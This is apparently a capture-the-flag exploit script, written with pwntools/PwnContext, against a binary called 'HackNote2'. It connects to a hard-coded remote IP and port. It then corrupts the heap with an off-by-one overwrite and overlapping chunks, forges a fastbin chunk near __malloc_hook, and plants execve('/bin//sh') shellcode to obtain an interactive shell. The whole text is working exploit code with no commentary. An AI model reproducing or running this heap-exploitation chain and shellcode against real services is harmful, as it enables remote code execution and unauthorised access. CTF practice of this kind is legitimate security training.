1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68
| from PwnContext import * if __name__ == '__main__': context.terminal = ['tmux', 'split', '-h'] s = lambda data :ctx.send(str(data)) sa = lambda delim,data :ctx.sendafter(str(delim), str(data)) sl = lambda data :ctx.sendline(str(data)) sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data)) r = lambda numb=4096 :ctx.recv(numb) ru = lambda delims, drop=True :ctx.recvuntil(delims, drop) irt = lambda :ctx.interactive() rs = lambda *args, **kwargs :ctx.start(*args, **kwargs) leak = lambda address, count=0 :ctx.leak(address, count) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) debugg = 0 logg = 1 ctx.binary = './HackNote2' ctx.breakpoints = [0x400EB9] if debugg: rs() else: ctx.remote = ('183.129.189.62', 19104) rs(method = 'remote') if logg: context.log_level = 'debug' def choice(aid): sla('Exit',aid) def add(asize,acon): choice(1) sla('Size:',asize) sa('Note:',acon) def free(aid): choice(2) sla('Note:',aid) def edit(aid,acon): choice(3) sla('Note:',aid) sa('Note:',acon) malloc_hook = 0x6CB788 fake = malloc_hook-0x16 add(0x18,'0\n') add(0x108,'\x00'*0xf0+p64(0x100)+'\n') add(0x100,'2\n') add(0x10,'3\n') free(1) edit(0,'0'*0x18) edit(0,'0'*0x18+p16(0x100)) add(0x80,'111\n') add(0x30,'4\n') add(0x20,'5\n') free(1) free(2) free(4) add(0xa0,'0'*0x88+p64(0x41)+p64(fake)+p64(0)) add(0x30,'2\n') shellcode="" shellcode += "\x31\xf6\x48\xbb\x2f\x62\x69\x6e" shellcode += "\x2f\x2f\x73\x68\x56\x53\x54\x5f" shellcode += "\x6a\x3b\x58\x31\xd2\x0f\x05" add(0x38,'\x00'*0x6+p64(malloc_hook+8)+shellcode+'\n') irt()
|